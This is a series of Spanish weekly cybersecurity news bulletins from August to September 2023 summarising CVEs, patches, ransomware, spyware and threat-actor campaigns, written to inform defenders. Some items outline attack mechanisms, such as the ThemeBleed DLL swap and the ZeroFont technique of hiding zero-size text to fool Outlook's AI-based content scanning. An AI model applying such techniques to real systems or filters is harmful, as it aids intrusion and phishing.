WS_FTP Server, su solución de software de servidor FTP. Progress ha publicado dos nuevas actualizaciones de seguridad en la que se parchean un total de ocho fallos de seguridad, incluyendo dos vulnerabilidades de severidad crítica y tres de severidad alta. La primera vulnerabilidad crítica, CVE-2023-40044, permitiría a un atacante previamente autenticado aprovechar una vulnerabilidad de deserialización de .NET en el módulo Ad Hoc Transfer para ejecutar comandos remotos en el servidor subyacente. La segunda vulnerabilidad crítica, CVE-2023-42657, admite ataques transversales de directorio. Esto podría permitir a un atacante manipular rutas para acceder, eliminar o modificar archivos fuera de sus directorios autorizados. También se han detectado las vulnerabilidades CVE-2023-40045, CVE-2023-40047, CVE-2023-40046, CVE-2023-40048, CVE-2022-27665 y CVE-2023-40049. Más info Explotadas tres 0-days en Apple para distribuir el malware Predator El equipo de investigadores de Citizen Lab, en colaboración con el Grupo de Análisis de Amenazas de Google (TAG), publicaron una investigación en la que informan sobre la explotación de tres vulnerabilidades 0-day de Apple para instalar el software espía Predator. En concreto, dichos fallos de seguridad fueron parcheados el pasado jueves por la compañía, y según los expertos estos fueron previamente aprovechados para infectar el dispositivo móvil de Ahmed Eltantawy, candidato a las elecciones presidenciales de Egipto en 2024. Según los investigadores, actores maliciosos habrían explotado las vulnerabilidades CVE-2023-41993, aprovechada para la ejecución remota de código en Safari utilizando páginas web creadas con fines maliciosos, seguidamente el fallo CVE-2023-41991, que permite la omisión de validación de firmas, y por último la CVE-2023-41992 que provoca la escalada de privilegios del kernel. Cabe indicar que dichas acciones habrían tenido lugar entre mayo y septiembre de 2023 utilizando como vector de entrada la remisión de mensajes de SMS y de WhatsApp. Más info ZeroFont: nueva técnica de phishing en Outlook Un informe de ISC Sans ha revelado una nueva técnica de phishing, en la que se utilizan fuentes de punto cero para que los correos electrónicos maliciosos parezcan escaneados de forma segura por las herramientas de seguridad de Microsoft Outlook. Esta técnica, denominada ZeroFont, consiste en la inserción de palabras o caracteres ocultos en los correos electrónicos, estableciendo el tamaño de la fuente en cero, haciendo que el texto sea invisible para las personas y manteniéndolo legible con algoritmos de PNL. Con la inserción de estos caracteres invisibles, junto con contenido sospechoso, se consigue evadir los filtros de seguridad, distorsionando la interpretación que hace la IA del contenido y el resultado de los controles de seguridad. Al recibir el correo electrónico con un mensaje previo del escaneo de seguridad, la víctima puede creer que se trata de un correo legítimo. Más info Imagen de Rawpixel.com en Freepik. Cyber Security AI of Things Riesgos en la Inteligencia Artificial: inyección de prompts en chatbots 26 de septiembre de 2023
29 de septiembre de 2023
.jpg)
Boletín de Ciberseguridad, 16 - 22 de septiembre
Apple parchea tres nuevas 0-day Apple ha lanzado dos actualizaciones de seguridad de emergencia que parchean tres nuevas vulnerabilidades 0-day que podrían haber sido explotadas. Por un lado, en el primero de los security advisories publicados por Apple, centrado en macOS Ventura, se tratan CVE-2023-41992, que afecta al Kernel Framework y puede explotarse por un actor amenaza para una elevación de privilegios, y CVE-2023-41991, fallo que afecta al Security Framework y puede ser empleado para evitar la validación de firmas usando aplicaciones maliciosas. Por otro lado, el segundo advisory trata de iOS y iPadOS e incluye además el parcheo de la vulnerabilidad CVE-2023-41993, que afecta al motor de navegación WebKit y permitiría a un atacante ejecutar código arbitrario remotamente. Las tres 0-day han sido parcheadas con el lanzamiento de las versiones macOS 12.7/13.6, iOS 16.7/17.0.1, iPadOS 16.7/17.0.1, and watchOS 9.6.3/10.0.1. Más info Silent Skimmer, campaña de skimming de tarjetas de crédito El equipo de BlackBerry ha descubierto una campaña con motivación financiera, a la que han denominado Silent Skimmer. La campaña, que llevaría activa más de un año, se dirigió en primer lugar a empresas en las regiones de Asia y el Pacífico, si bien últimamente ha fijado como objetivos América del Norte y América Latina. Los actores amenaza explotan vulnerabilidades en aplicaciones web para obtener acceso a los sitios, de forma que, si el servicio web tiene permisos de escritura, el exploit carga una DLL maliciosa que instala malware como Magecart para robar datos de tarjetas de crédito del sitio. Finalmente, los investigadores indican que los actores tendrían habilidades técnicas debido al uso de un gran conjunto de herramientas para escalar privilegios, herramienta para el acceso remoto, un exploit para la ejecución remota de código, además de su infraestructura C2. Más info Microsoft expone 38 Terabytes de datos privados a través de GitHub El equipo de investigadores de Wiz ha descubierto que Microsoft sufrió una filtración accidental de datos que afectó a su repositorio público de GitHub. Según los expertos, el problema comenzó en julio de 2020 y se ha mantenido durante casi tres años hasta que los investigadores identificaron que un empleado de Microsoft había compartido una URL de almacenamiento de Azure mal configurada. La exposición de datos se produjo debido a un token de acceso compartido (SAS). Además de modelos de IA de código abierto, se filtraron aproximadamente 38TB de datos privados, incluyendo copias de seguridad de información personal de empleados de Microsoft, contraseñas y mensajes internos de Microsoft Teams. A pesar de la gran cantidad de documentación expuesta, Microsoft afirmó que no se comprometieron datos de clientes ni servicios internos. Wiz informó el incidente a MSRC el 22 de junio de 2023, que revocó el token SAS para bloquear todo acceso externo a la cuenta de almacenamiento de Azure, mitigando el problema el 24 de junio de 2023. Más info La CISA y FBI publican análisis sobre ransomware Snatch La Agencia de Seguridad de Infraestructura y Ciberseguridad y el FBI han publicado un aviso de seguridad donde analizan el ransomware Snatch. Según los investigadores, se estima que, desde mediados de 2021, los operadores Snatch han evolucionado constantemente sus tácticas en las operaciones realizadas, asimismo, cabe indicar que esta familia de ransomware utiliza la conocida técnica de doble extorsión. En cuanto a la victimología, se han dirigido a una amplia gama de sectores de infraestructura críticas, como sectores de defensa, alimentación, tecnológico, entre otros. En concreto, la compañía de seguridad Optiv calcura que entre 2022 y 2023 existen hasta un total de 70 ataques de Snatch, la mayoría geolocalizados en EE.UU. En último lugar, tanto el FBI como la CISA recomiendan a las organizaciones implementar las recomendaciones de la sección Mitigaciones de este CSA para reducir la probabilidad y el impacto de incidentes de ransomware. Más info Vulnerabilidades en MOVEit Transfer permiten acceso a bases de datos Progress Community ha publicado actualizaciones para MOVEit Transfer tras la divulgación de tres vulnerabilidades en el producto. La primera de ellas, identificada como CVE-2023-42660, y con CVSS 8.8, es un fallo de inyección SQL descubierto en la interfaz de la máquina MOVEit Transfer. Un atacante autenticado podría aprovechar el fallo enviando un payload a la interfaz, y modificar y divulgar el contenido de la base de datos MOVEit. Por su parte, el fallo CVE-2023-40043 y CVSS 7.2, también se trata de una vulnerabilidad de inyección SQL en la interfaz web de MOVEit Transfer, que podría derivar en el acceso no autorizado a la base de datos. En este caso el requisito para el aprovechamiento del fallo es que el atacante tenga acceso a una cuenta de administrador. Finalmente, la identificada como CVE-2023-42656, con CVSS 6.1, se refiere a una vulnerabilidad XSS reflejada; a través de la que un actor amenaza puede enviar un payload y ejecutar JavaScript malicioso en el navegador de la víctima. Las tres vulnerabilidades, que afectan a MySQL o MSSQL DB de MOVEit Transfer han quedado resueltas con el lanzamiento del Service Pack de septiembre. Más info Cyber Security El error del billón de dólares 29 de mayo de 2024 Iamgen jcomp / Freepik.
22 de septiembre de 2023
 (1).jpg)
Boletín de Ciberseguridad, 9 - 15 de septiembre
Microsoft parchea múltiples vulnerabilidades incluidas dos 0-day Microsoft publicó una actualización de seguridad en la que se detallan un total de cincuenta y nueve vulnerabilidades que van a ser parcheadas, incluyendo cinco de severidad crítica y dos 0-day explotadas activamente. De las dos 0-day, CVE-2023-36802 (CVSS 7.8) afecta a Microsoft Streaming Service y permitiría a un atacante llevar a cabo una elevación de privilegios, mientras que CVE-2023-36761 (CVSS 6.2) afecta a Microsoft Word y puede ser explotada por un atacante para robar hashes NTLM al abrir un documento. Por otro lado, las vulnerabilidades críticas incluidas en la actualización afectan a .NET y Visual Studio (CVE-2023-36796, CVE-2023-36792, CVE-2023-36793), a Azure Kubernetes Service (CVE-2023-29332) y a Windows Internet Connection Sharing (CVE-2023-38148). Adicionalmente a las cincuenta y nueve vulnerabilidades ya mencionadas, la actualización incluye otros cinco fallos de Microsoft Edge (Chromium) y dos fallos de Electron y Autodesk. Más info SAP parchea dos vulnerabilidades críticas en el Security Patch Day de septiembre SAP anunció en su Security Patch Day de septiembre el lanzamiento de trece nuevas notas de seguridad, de las cuales tres son actualizaciones de notas lanzadas previamente. La vulnerabilidad más severa parcheada en este lanzamiento es CVE-2023-40622 (CVSS 9.9), que permite a los atacantes acceder a información de BusinessObjects permitiendo a su vez, en futuros ataques, comprometer la aplicación de forma completa. Por otro lado, SAP también indica haber parcheado otra vulnerabilidad crítica, CVE-2023-40309 (CVSS 9.8), que afecta a CommonCryptoLib y es un fallo de verificación de autorización y puede resultar en una escalada de privilegios. Los parches que solucionan CVE-2023-40309 también solucionan otra de las vulnerabilidades mencionadas en este Security Patch Day, en concreto CVE-2023-40308 (CVSS 7.5), un error de corrupción de memoria en CommonCryptoLib. Por último, la mayoría de las demás notas de seguridad parchean vulnerabilidades de severidad media o baja. Más info Exploit público para el fallo RCE ThemeBleed en Windows 11 El investigador Gabe Kirkpatrick publicó una PoC para una vulnerabilidad de Windows, descubierta en un bug bounty. El fallo, identificado como CVE-2023-38146, con CVSS 8.8, es una vulnerabilidad que permite la ejecución remota de código, la cual puede explotarse si el usuario abre un archivo .THEME malicioso, creado por el atacante. El investigador detectó el fallo buscando formatos de archivo extraños de Windows, cuando descubrió que cuando se usa un número de versión 999, la rutina para controlar el archivo .MSSTYLES presenta una discrepancia entre el momento en que se verifica la firma de una DLL y el momento en que se carga la librería. Un atacante, con un .MSSTYLES especialmente diseñado, puede reemplazar una DLL verificada por una maliciosa, pudiendo ejecutar código arbitrario en el sistema víctima. Con la PoC, Kirkpatrick consiguió abrir la Calculadora de Windows cuando el usuario inicia un archivo de temas. Microsoft ha corregido el fallo en el Patch Tuesday emitido esta semana, eliminando la funcionalidad de la versión 999, si bien la condición persiste. Más info 3AM: nuevo ransomware empleado como alternativa a LockBit El Threat Hunter Team de Symantec publicó el análisis de una nueva familia de ransomware, 3AM, que ha sido empleada conjuntamente en un mismo ataque con el ransomware LockBit. En concreto, al ser LockBit bloqueado por la red objetivo, los atacantes emplearon 3AM en el incidente, logrando infectar tres equipos. Este nuevo ransomware, escrito en Rust, intenta detener varios servicios del dispositivo infectado antes de cifrar los archivos, y una vez completado el cifrado intenta eliminar las copias Volume Shadow (VSS). En su nota de rescate, los atacantes afirman que no filtrarán los datos que han obtenido, pero, en caso de no pagar el rescate, venderán dichos datos en la Dark Web. Symantec destaca que 3AM es una familia de ransomware completamente nueva y que sus autores no han sido asociados a ninguna organización cibercriminal. Al haber sido empleado como alternativa a LockBit, es probable que este nuevo malware se vuelva más popular en el futuro y, por lo tanto, empiece a ser más empleado por otros actores amenaza. Más info Colombia activa el Puesto de Mando Unificado Ciber (PMU Ciber) por el ataque a IFX Networks Mauricio Lizcano, ministro del Ministerio de Tecnologías de la Información y Comunicaciones de Colombia, informó a través de su cuenta oficial en Twitter que el gobierno activó el Puesto de Mando Unificado Ciber (PMU Ciber) para tratar de paliar los efectos del ciberataque sufrido por el proveedor de telecomunicaciones IFX Networks. Además, Lizcano anunció que el total de organizaciones afectadas asciende a 762 sitas no sólo en Colombia sino también en Argentina y Chile. Más info Cyber Security La hipocresía del doble lenguaje entre las bandas de ransomware 14 de julio de 2022 Imagen de apertura: kjpargeter / Freepik.
15 de septiembre de 2023
.jpg)
Boletín de Ciberseguridad, 2 - 8 de septiembre
DB#JAMMER: campaña maliciosa contra servidores Microsoft SQL El equipo de investigadores de Securonix ha publicado una investigación sobre una campaña maliciosa denominada DB#JAMMER en la que actores maliciosos están atacando servidores MS SQL para distribuir ransomware. No se ha podido concretar al grupo detrás de estos incidentes, no obstante, se ha detallado que la metodología empleada por ellos seguiría un mismo patrón, el cual consiste en conseguir acceso inicial mediante ataques de fuerza bruta en los servidores MS SQL. Consecuentemente, comienzan a realizar tareas de enumeración y reconocimiento de la red con el objetivo de que en la siguiente fase se consiga actuar contra el firewall del sistema y establecer persistencia conectándose a un recurso compartido SMB remoto para transferir archivos hacia y desde el sistema de la víctima, así como instalar herramientas como Cobalt Strike. En último lugar, esta campaña finaliza con la distribución del ransomware FreeWorld, al que se considera que se trata de una variante del ransomware denominado Mimic. Más información Nueva variante del malware Agent Tesla FortiGuard Labs ha descubierto una campaña de phishing empleada para propagar una nueva variante de Agent Tesla, familia de malware empleada como Malware-as-a-Service y que emplea un Troyano de Acceso Remoto (RAT) y un data stealer para conseguir acceso a los dispositivos. Esta campaña empieza con un email de phishing que incluye un archivo Excel empleado para, una vez abierto por el usuario, explotar la vulnerabilidad CVE-2017-11882/CVE-2018-0802, que permite la ejecución de código remoto. De esta forma, se descarga e instala Agent Tesla, permitiendo así al actor amenaza el robo de información sensible de la víctima, incluyendo credenciales, información del keylogging y capturas de pantalla del dispositivo. Por último, el malware, que cifra sus módulos más relevantes para evitar ser analizado, transmite la información sensible robada a través de emails con protocolo SMTP. Más información Nuevas vulnerabilidades 0-day de Apple activamente explotadas La compañía Apple ha emitido un aviso de seguridad en donde corrige dos nuevas vulnerabilidades 0-day que están siendo activamente explotadas. En concreto, los fallos de seguridad han sido registrados como CVE-2023-41064, el cual es una debilidad de desbordamiento de búfer que se activa al procesar imágenes creadas con fines malintencionados y puede provocar la ejecución de código arbitrario. Paralelamente, la CVE-2023-41061, que es un problema de validación que puede explotarse mediante un archivo adjunto malicioso. Investigadores de Citizen Lab han publicado una investigación en la que detallan que estas vulnerabilidades fueron aprovechadas mediante una cadena de exploits de iMessage zero-click llamada BLASTPASS que se utilizó para implementar el software Pegasus de NSO Group a través de archivos adjuntos PassKit que contienen imágenes maliciosas. Apple recomienda a sus usuarios actualizar sus activos a las siguientes versiones macOS Ventura 13.5.2, iOS 16.6.1, iPadOS 16.6.1 y watchOS 9.6.2. Más información Android parchea una vulnerabilidad explotada activamente y tres críticas Android ha publicado un nuevo boletín en el que incluye las vulnerabilidades parcheadas en la actualización de seguridad de septiembre, incluyendo una de alta severidad que parece estar siendo explotada, de acuerdo con Google. Esta vulnerabilidad (CVE-2023-35674) permitiría a un actor amenaza realizar una escalada de privilegios sin necesidad de interacción con el usuario. En dicho boletín se afirma haber parcheado un total de 34 vulnerabilidades, entre ellas tres de severidad crítica (CVE-2023-35658, CVE-2023-35673, CVE-2023-35681) que permitirían a un atacante ejecutar código remotamente sin requerir privilegios de ejecución adicionales. La actualización de seguridad va dirigida a los dispositivos con las versiones de Android 11, 12 y 13, por lo que se recomienda a los usuarios de estas versiones instalar la actualización lo antes posible, mientras que, en caso de tener un dispositivo con Android 10 o inferior, se recomienda actualizar a un dispositivo con una versión más reciente. Más información Investigación de técnicas utilizadas en ataques del actor amenaza Storm-0558 El pasado mes de julio Microsoft publicó un artículo en el que informaba cómo mitigó un ataque del actor amenaza conocido como Storm 0558 y que estaba dirigido a cuentas de correo electrónico de hasta 25 entidades distintas entre agencias del gobierno de EE. UU, incluido el Departamento de Estado, e instituciones europeas. Según los datos aportados recientemente, Storm-0558 pudo llevar a cabo el ataque debido a que encontró información sobre una clave digital después de comprometer una cuenta corporativa de un ingeniero de Microsoft en abril del año 2021. Gracias a la exfiltración de dicha clave, el actor amenaza pudo crear sus propios tokens de autenticación para acceder a las cuentas de correo electrónico Outlook de funcionarios gubernamentales de alto rango. En base a estos hechos, Microsoft revocó todas las claves de firma MSA válidas para evitar acceder a otras claves comprometidas y señala que no han identificado ninguna evidencia de accesos no autorizados a cuentas de clientes empleando la misma técnica de falsificación de tokens de autenticación. Más información Imagen Rawpixel / Freepik.
8 de septiembre de 2023
.jpg)
Boletín de Ciberseguridad, 26 agosto - 1 septiembre
Nuevas variantes de ransomware Lockbit El equipo de investigadores de Kaspersky ha publicado un artículo informando sobre la aparición de nuevas cepas del ransomware LockBit. En concreto, los expertos señalan que, desde septiembre de 2022, momento en que se produjo una filtración en la red del builder de Lockbit, ha permitido que cualquiera pueda crear una versión personalizada del ransomware. Desde Kaspersky apuntan a que, del total de 396 muestras identificadas, 312 artefactos se asocien a variantes provenientes de dicha filtración. Cabe destacar que de estas nuevas versiones se ha detectado un incidente mediante el cual el procedimiento de la nota de demanda de rescate ha variado. En ella se observa como titular el nombre de un grupo denominado National Hazard Agency, que se suma al de otros grupos que utilizan variantes denominados como Bl00dy y Buhti, y en el que se indica directamente la cantidad a pagar y dirige sus comunicaciones a un servicio Tox y a un correo electrónico, al contrario que con el grupo lockBit que no mencionaban cantidad y la comunicación se realizaba en su plataforma. A modo de conclusión, desde Kaspersky indican que, de las muestras analizadas, 77 no llevarían en la nota el nombre de Lockbit. More info Vulnerabilidad en Intel CPU afecta a sistemas Windows Microsoft ha publicado un artículo en el que alerta de un nuevo ataque que estaría explotando la vulnerabilidad Downfall en dispositivos Windows. La vulnerabilidad, identificada como CVE-2022-40982, con CVSS de 6.5, afecta a varias versiones de procesadores Intel y a todas las versiones de Windows 10, Windows 11 y Windows Server 2019 y 2022. Se trata de un fallo que cuya explotación exitosa permitiría a un usuario autenticado habilitar la divulgación de información a través del acceso local, pudiendo utilizarse para inferir datos de CPU afectadas, como el kernel de usuario, los procesos, las máquinas virtuales y los entornos de ejecución confiables. Cabe destacar que la vulnerabilidad ha quedado mitigada con la actualización del microcódigo Intel Platform Update 23.3. Más info Campaña maliciosa atacando activos Citrix NetScaler El equipo de investigadores de Sophos ha realizado una publicación en su perfil de Twitter en la que señala actividad de una campaña maliciosa explotando una vulnerabilidad en Citrix NetScaler. En concreto, el fallo de seguridad al que hace referencia se trata de la CVE-2023-3519, que según los expertos un actor amenaza, probablemente atribuido a FIN8, llevaría desde el presente mes de agosto aprovechando dicha vulnerabilidad que le permitiría realizar inyecciones de cargas útiles, implementa scripts de PowerShell ofuscados y colocar webshells PHP en los sistemas de las víctimas. Asimismo, desde Sophos han señalado al medio digital BleepingComputer que debido a la posible atribución del actor FIN8, este podría tener como fin concreto de la campaña infectar a sus víctimas con la distribución del ransomware BlackCat. En último lugar, cabe indicar que la vulnerabilidad CVE-2023-3519 dispone de parches desde el pasado mes de julio, no obstante, se estima que en agosto aún se encontraban más de 31.000 activos expuestos vulnerables. Más info Vulnerabilidad de criticidad alta parcheada en Google Chrome Google ha parcheado una vulnerabilidad de criticidad alta que afecta a Chrome en la nueva actualización de seguridad, versión 116.0.5845.140 para Mac y Linux, y 116.0.5845.140/.141 para Windows, que será lanzada en los próximos días. La vulnerabilidad registrada como CVE-2023-4572, es de tipo use after free y afecta a MediaStream. Un atacante podría explotar este error para manipular el activo si dicho programa no elimina el puntero de una localización de memoria después de liberarla. Además, Google ha informado de que las actualizaciones que parcheen vulnerabilidades de seguridad de alto impacto serán lanzadas semanalmente, en vez de cada cuatro semanas, con el objetivo de implementar soluciones de seguridad más rápido. Con esto, la empresa también pretende que las actualizaciones semanales ayuden a resolver la brecha de parches en el ciclo de lanzamientos de Chrome. Más info Análisis de las nuevas variantes de SapphireStealer SapphireStealer es un malware de tipo stealer programado en .NET y enfocado en el robo de credenciales de bases de datos de navegadores, cuyo código fue publicado por primera vez en diciembre de 2022 GitHub. Sin embargo, los investigadores de Cisco Talos afirman que a principios de 2023 nuevas versiones empezaron a ser publicadas, existiendo en la actualidad múltiples variantes de este malware que están siendo explotadas por varios actores amenaza. Mientras que SapphireStealer puede robar información sensible de los dispositivos infectados, incluyendo capturas de pantalla, credenciales de navegadores e información del host; las nuevas variantes también parecen estar centradas en la mejora de la exfiltración de los datos. En último lugar, cabe indicar que este stealer también ha sido empleado en conjunto con otro malware, FUD-Loader, en infecciones multietapa. Más info
1 de septiembre de 2023
.jpg)
Boletín de Ciberseguridad, 19-25 agosto
Google parchea múltiples vulnerabilidades de alta severidad en Chrome Google ha publicado el lanzamiento de una actualización de seguridad para Chrome que parchea cinco vulnerabilidades reportadas por investigadores externos a la empresa, cuatro de las cuales han sido clasificadas con severidad alta. De las cinco vulnerabilidades, CVE-2023-4430, un error tipo use-after-free en Vulkan, es la que presenta mayor severidad, de acuerdo con la empresa. Otra de las vulnerabilidades parcheadas es CVE-2023-4429, también de tipo use-after-free en el componente Loader. Por otro lado, las otras tres vulnerabilidades parcheadas en la nueva actualización permiten acceder a la memoria out of bounds y afectan a CSS (CVE-2023-4428), V8 (CVE-2023-4427) y Fonts (CVE-2023-4431). Cabe destacar Google no ha hecho mención a que ninguna de las vulnerabilidades haya sido explotada en ataques. La empresa recomienda actualizar a las versiones de Google Desktop Stable 116.0.5845.110 para macOS y Linux o 116.0.5845.110/.111 para Windows. Más info HiatusRAT apunta contra Taiwán y el Departamento de Defensa de EE UU El grupo de actores amenaza detrás del malware HiatusRAT ha reanudado su actividad, focalizándose en organizaciones en Taiwán y en un sistema de adquisición militar estadounidense. Investigadores de Lumen identificaron esta nueva campaña, aunque su identidad y origen siguen siendo desconocidos. Los actores amenaza utilizan servidores VPS nuevos para alojar muestras del malware, y sus objetivos abarcan empresas comerciales y una entidad gubernamental taiwanesa, así como un servidor del Departamento de Defensa de EE. UU. Asimismo, cabe indicar que han adaptado el software malicioso a varias arquitecturas, prefiriendo dispositivos Ruckus y dirigiendo conexiones desde Taiwán, siendo utilizado para espiar a través de routers empresariales, creando una red proxy C2 con dispositivos de redes perimetrales infectados. Aunque su objetivo final es incierto, se sospecha que buscan información sobre contratos militares. HiatusRAT, fue descubierto a mediados marzo de 2023, y para ese entonces apuntaba a activos de alto nivel para espiar objetivos en Latinoamérica y Europa. Más info El FBI trata de impedir que Lazarus retire 40 millones de dólares en criptomonedas El FBI ha publicado un comunicado en el que solicita a las empresas de criptomonedas colaboración para tratar de impedir que Lazarus, APT patrocinada por Corea del Norte y que también recibe los nombres de APT38 o TraderTraitor, retire aproximadamente 1,580 Bitcoins procedentes de robos de sus monederos. Para ello, ha publicado las direcciones de dichos monederos y ha solicitado a las empresas de criptomonedas que analicen los datos de blockchain vinculados a estas direcciones y traten de evitar transacciones que las involucren, tanto directa como indirectamente. En el comunicado, además, el FBI acusa a Lazarus de ser el responsable del robo de 60 millones de dólares a Alphapo, de 37 millones a CoinsPaid y de 100 millones a Atomic Wallet. Más info Empresas danesas de Hosting víctimas de ransomware Las empresas de Hosting CloudNordic y AzeroCloud en Dinamarca sufrieron ataques de ransomware resultando en la pérdida de datos de clientes y el cierre de sistemas, incluyendo sitios web y correo electrónico. A pesar de los esfuerzos de restauración, los datos han sido irrecuperables y han llevado a la pérdida de información de la mayoría de los clientes. Ambas marcas, pertenecientes a la Certiqa Holding ApS, se negaron a pagar rescate a los actores amenaza y se encuentran colaborando con expertos en ciberseguridad y la policía. Según las declaraciones de ambas empresas, el ataque alcanzó esta magnitud de daño debido a la infección de servidores críticos durante una migración del centro de datos, lo que permitió a los atacantes acceder a los sistemas administrativos críticos, de almacenamiento de datos, y a los sistemas de respaldo. Asimismo, cabe señalar que tanto CloudNordic como AzeroCloud afirman que no evidenciaron acceso no autorizado a datos, aunque cientos de clientes perdieron información almacenada en la nube. Más info Vulnerabilidad RCE en WinRAR El investigador "goodbyeselene" de Zero Day Initiative descubrió una vulnerabilidad crítica en WinRAR, la popular herramienta de compresión de archivos para Windows. Esta vulnerabilidad, conocida como CVE-2023-40477, ha generado preocupación debido al potencial uso por actores amenaza ya que podría ser aprovechada por atacantes remotos para ejecutar código arbitrario en el sistema objetivo con sólo abrir un archivo RAR. La vulnerabilidad reside en la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede llevar a un acceso no autorizado a la memoria más allá del final de un búfer asignado. RARLAB actuó rápidamente al ser notificado sobre la vulnerabilidad y publicó la versión 6.23 de WinRAR, la cual aborda efectivamente esta vulnerabilidad. Más info Imagen: Rawpixel / Freepik.
25 de agosto de 2023
Boletín de Ciberseguridad, 4-11 agosto
Patch Tuesday Microsoft agosto corrige dos vulnerabilidades explotadas activamente Microsoft ha corregido en su Patch Tuesday correspondiente al mes de agosto 74 vulnerabilidades, entre las que se encuentran dos 0-day, las cuales han sido explotados activamente, y 6 fallos críticos. En concreto, los fallos de seguridad que han sido aprovechados previamente a su corrección se han identificado como ADV230003, y se refiere a una falla de seguridad ya conocida como CVE-2023-36884, CVSSv3 de 8.8, cuyo aprovechamiento permite la ejecución remota de código en Office y Windows HTML. Asimismo, destaca el fallo identificado como CVE-2023-38180 que en caso de ser aprovechado puede causar un ataque de DDoS en aplicaciones .NET y Visual Studio. Cabe indicar que Microsoft ha reconocido que estaría disponible una PoC de esta última vulnerabilidad. En último lugar, cabe señalar que en estas actualizaciones no se incluyen las doce vulnerabilidades de Microsoft Edge (Chromium) corregidas a principios de este mes. Más info aquí Downfall: la nueva vulnerabilidad de los microprocesadores de Intel Un investigador de Google, Daniel Moghimi, ha descubierto cómo explotar una nueva vulnerabilidad, denominada CVE-2022-40982 o Downfall, que afecta a procesadores de Intel con las arquitecturas Intel Skylake a Ice Lake, y permite el robo de información sensible protegida por software Guard eXtensions (SGX), el cifrado de memoria basado en hardware de Intel. Moghimi desarrolló dos técnicas de ataque Downfall que emplean la instrucción gather: Gather Data Sampling (GDS) y Gather Value Injection (GVI); ambas requieren al atacante estar en el mismo procesador físico que la víctima, aunque un programa local o un malware podrían también explotar la vulnerabilidad. Aunque los detalles del fallo se mantuvieron privados durante un año con el objetivo de encontrar soluciones, no se ha llevado a cabo el rediseño del hardware que eliminaría el riesgo de ataques Downfall, aunque sí se han propuesto soluciones basadas en software por parte del investigador. Más info aquí Análisis del actor amenaza RedHotel El equipo de investigadores de Recorded Future ha publicado los resultados de una investigación en la que analizan a un actor amenaza atribuido a China y que recibe el nombre de RedHotel. Según los expertos, a este actor amenaza se le atribuyen ataques contra 17 países entre los años 2021 y 2023, aunque su origen se podría remontar al año 2019. Entre los objetivos de RedHotel abarcan instituciones académicas, aeroespaciales y servicios de comunicación, aunque la mayoría se tratarían de organizaciones gubernamentales. En cuanto a sus objetivos, este actor amenaza destaca por tratar de recopilar inteligencia, así como enfocarse en el espionaje económico. En cuanto a su metodología de acción, destaca por explotar el fallo de seguridad denominado Log4Shell, utilizar herramientas como Cobalt Strike y Brute Ratel C4 (BRc4) y familias de malware como FunnySwitch, ShadowPad, Spyder y Winnti. Asimismo, se centra en el reconocimiento inicial y el acceso a la red a largo plazo a través de servidores de comando y control, los cuales comúnmente se tratan de dominios registrados en NameCheap. Más info aquí Utilizan PDF infectados para distribuir el actualizado malware STRRAT Investigadores de seguridad de Cyble Research and Intelligence Labs (CRIL) han identificado que el RAT basado en Java llamado STRRAT, que era capaz de realizar keylogging y robo de credenciales en navegadores y clientes de correo electrónico, ha evolucionado drásticamente y que en la actualidad tiene nuevos métodos de distribución. Ahora, la versión actualizada, incorpora el módulo de ransomware Crimson y despliega multitud de cadenas de infección. El vector de entrada utilizado es mediante un correo electrónico malicioso, que al abrirse el PDF adjunto se incita a la descarga de un archivo ZIP que contiene el JavaScript malicioso. Para mantener la persistencia, el RAT crea una entrada en el programador de tareas con el nombre Skype. Además de esto, la versión 1.6 de STRRAT emplea dos técnicas de ofuscación de cadenas: Zelix KlassMaster (ZKM) y Allatori, que dificultan el análisis y la detección del malware por parte de los investigadores de seguridad. Más info aquí Statc Stealer: nuevo malware que se hace pasar por anuncios legítimos de Google El equipo de Zscaler ThreatLabz ha descubierto un nuevo malware sofisticado denominado Statc Stealer, que infecta dispositivos Windows haciéndose pasar inicialmente por un anuncio de Google auténtico. Este nuevo stealer es capaz de exfiltrar información sensible como tarjetas de crédito, credenciales y billeteras de criptomonedas a través de los buscadores más empleados en Windows, incluyendo Chrome, Edge, Firefox y Opera. Además, Statc Stealer está programado en C++, puede hacer uso de técnicas de evasión que evitan ser detectado frustrando los intentos de ingeniería inversa, y hace uso del protocolo HTTPS para enviar los datos robados cifrados a su servidor de comando y control. Zscaler avisa de que la infección con este stealer en organizaciones y empresas puede implicar diversos riesgos, incluyendo pérdidas financieras y daño reputacional. Más info aquí
11 de agosto de 2023
16 posts sobre Ciberseguridad para conocer y protegerte de las ciberamenazas
En un mundo cada vez más digitalizado, proteger nuestros datos e información se ha vuelto esencial. Con la creciente dependencia de la tecnología aumenta también el número y la sofisticación de los ciberataques y amenazas. En este post hemos recopilado una selección de contenidos que exploran la importancia de la Ciberseguridad y cómo enfrentar los desafíos actuales. A través de 16 posts, conocerás diferentes tipos de ataques, técnicas para prevenirlos y herramientas para detectar y responder a incidentes de seguridad. Un incidente de seguridad puede poner en riesgo la reputación de una empresa, sus resultados financieros y la continuidad de su negocio. Descubrirás las mejores prácticas para proteger tus sistemas y activos valiosos, esenciales para la continuidad de cualquier organización y para fortalecer tu estrategia de seguridad frente a las ciberamenazas. Ciberseguridad IA & Data Evolución de la Ciberseguridad: la IA como herramienta de ataque y defensa 28 de junio de 2023 Ciberseguridad “Fuera de la oficina”: cómo comunicar que estás de vacaciones protegiendo tu privacidad y Ciberseguridad 4 de julio de 2024 Ciberseguridad Conectividad e IoT IA & Data Inteligencia Artificial aplicada a la Ciberseguridad industrial (OT) 25 de marzo de 2024 Cyber Security AI of Things Cosas que no deberías contarle a ChatGPT 4 de julio de 2023 Cyber Security Cuatro hitos en Ciberseguridad que marcaron el futuro del malware 22 de mayo de 2023 Cyber Security Cómo usar Passkey, el sustituto de Google para las contraseñas 17 de mayo de 2023 Ciberseguridad Future Workplace La importancia del control de acceso: ¿está tu empresa protegida? 29 de mayo de 2023 Cyber Security Cómo el lenguaje pone en riesgo la Ciberseguridad de las empresas 1 de junio de 2023 Cyber Security 3 factores clave de la Ciberseguridad 3 de julio de 2023 Cyber Security Typosquatting: cómo detectarlo y protegerse 7 de junio de 2023 Ciberseguridad Ciberseguridad: eventos “cisne negro” en un mundo conectado 21 de marzo de 2023 Ciberseguridad Cibercrimen, una amenaza constante para todo tipo de empresas 29 de marzo de 2023 Cyber Security Cloud Qué es el Esquema Nacional de Seguridad (ENS 2.0) 23 de marzo de 2023 Cyber Security Evolución de las técnicas de Spear-Phishing de los grupos criminales más conocidos y qué malware utilizan 17 de abril de 2023 Cyber Security Inteligencia Artificial, ChatGPT y Ciberseguridad 15 de febrero de 2023 Cyber 